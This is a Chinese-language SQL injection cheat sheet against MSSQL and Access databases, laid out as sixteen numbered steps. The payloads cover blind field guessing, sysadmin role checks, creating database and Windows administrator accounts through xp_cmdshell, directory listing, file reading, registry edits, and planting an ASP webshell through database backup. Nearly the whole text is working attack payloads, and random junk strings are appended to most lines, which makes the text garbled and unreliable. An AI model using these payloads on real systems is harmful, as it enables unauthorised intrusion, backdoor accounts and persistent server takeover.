1.判断是否有注入;and 1=1 ;and 1=2 ![X.%
2.初步判断是否是mssql ;and user>0 L[QI 5N
)z*$`?)k
3.注入参数是字符'and [查询条件] and ''=' 7Y @=x#
)l[7;ZIw$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' )@lo ';\
$S)e"Po~5
5.判断数据库系统 qhn&;{{
kw-Kx4 )
;and (select count(*) from sysobjects)>0 mssql ]~ g|SqPA@
F|n$0vQ*
;and (select count(*) from msysobjects)>0 access 9bzYADLI
$U"P+
D\_*,Fc
#LNB@E
6.猜数据库 ;and (select Count(*) from [数据库名])>0 L2/<+Zw
<76=H]h~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1,;qXMhK`;
H/v37%p7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #`6OC)1J
HS5Ug'\446
9.(1)猜字段的ascii值(access) ;hfG${l;
)*$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ~A:;?A'.
8HH.P`Vk#
(2)猜字段的ascii值(mssql) ]B[/sqf
)8N)Z~h
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^B"_b?b
v_1JH<GJ-
10.测试权限结构(mssql) b#\kZ/W
D!D%.
i$LV44
[(e`b
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Jk6/i;4|
m?R+Z6c[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U}vtVvx
u):Rw
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \Dsl7s=
i]^*J1a
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- :R|2z`b!
r<f-v_bxF
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- I+4qu|0lA
*i]Z=
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- n4d(`
XGrxzO|{
;and 1=(select IS_MEMBER('db_owner'));-- Z]> e & N
\8>N<B)
)>A%FL9
hwol7B>
11.添加mssql和系统的帐户 !PP?2Ax
:#!F 7u
;exec master.dbo.sp_addlogin username;-- $gD(MKR)~
;exec master.dbo.sp_password null,username,password;-- t;a}p_>
s7)# NT2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- EpoQV ^Ey
$lG--s
;exec master.dbo.xp_cmdshell 'net user username password Ad N=y8T
@ :
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7_'k`J@_
DkMC!Q\
;exec master.dbo.xp_cmdshell 'net user username password /add';-- HIp {< M3
Rx"VscB6z
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- CYic_rF$
\?mU$,voI
MvjwP?J]
r'JK$9
12.(1)遍历目录 m5Laq'~0_
T.Y4L
;create table dirs(paths varchar(100), id int) TX5/{cHd
zm^p7&ak$
;insert dirs exec master.dbo.xp_dirtree 'c:\' c.me1fGn
6`$z*C2{
;and (select top 1 paths from dirs)>0 U>M>FZ
-3XnK5
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z_ *ZUN?B
w7ABnX
K/LaA4
Fb4S/_
V
(2)遍历目录 -){^
Q:u
1ZH8/1gWI
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k}a!lI:
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ?B31t9
+z/73s0~
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 rN!9&
HBkQ`T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 GISI8W^
WAXrA$:3J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 21J82M
!m.')\4<
2!& ;ZcT,
%;XuA*e
13.mssql中的存储过程 $,@+Ua
n#AH@`&i
xp_regenumvalues 注册表根键, 子键 Vh-h{
rO>wX_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 |`9zE]
a{YVz\?d}
xp_regread 根键,子键,键值名 I)4|?tb?
z&G3&?Z
;exec xp_regread bX1! fa
#[rFep
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ZFw743G
@[N~;>
xp_regwrite 根键,子键, 值名, 值类型, 值 -Y,Ibq
4'eVFu+62
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 [
^ \)
nQ*oOxe|X
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 CMf~Yv
:r+
1>F$o
xp_regdeletevalue 根键,子键,值名 ^\t">NJ^
.3SjkC4I
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]V7hl#VO
wx7>0[ zE
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 KD<`-b)7<
JZ0+VB-3U
^rb7`s#G
R_&V.\e_
14.mssql的backup创建webshell
d~s-;T
\evgDZf
use model uPD_s[
\nt'I;f
create table cmd(str image); -PuVI5L<
Ho{?m^
insert into cmd(str) values (''); fH{$LjH(
xo3)dsX
backup database model to disk='c:\l.asp'; VH*(>^OfF
~$9"|
H zK=UcD
,=yIfbFQ
15.mssql内置函数 _'v )Fy
ol>=tk 8}
;and (select @@version)>0 获得Windows的版本号 {-Oc8XI/
u"3cSuqy
;and user_name()='dbo' 判断当前系统的连接用户是不是sa eh=bClk
nr%^:u
;and (select user_name())>0 爆当前系统的连接用户 q "vT]=Y}:
h v+i{Z9!]
;and (select db_name())>0 得到当前连接的数据库 blS4AQ?b^
A}}t86T
[_GR'x'0x
gU$3Y#R
16.简洁的webshell Z.19v>-c
SaScP
use model rV{e[fGd
V3nv5/6
create table cmd(str image); 7[,f;zG
#_5+kBA+>'
insert into cmd(str) values (''); !kYmrj**
^E8Hv
backup database model to disk='g:\wwwtest\l.asp';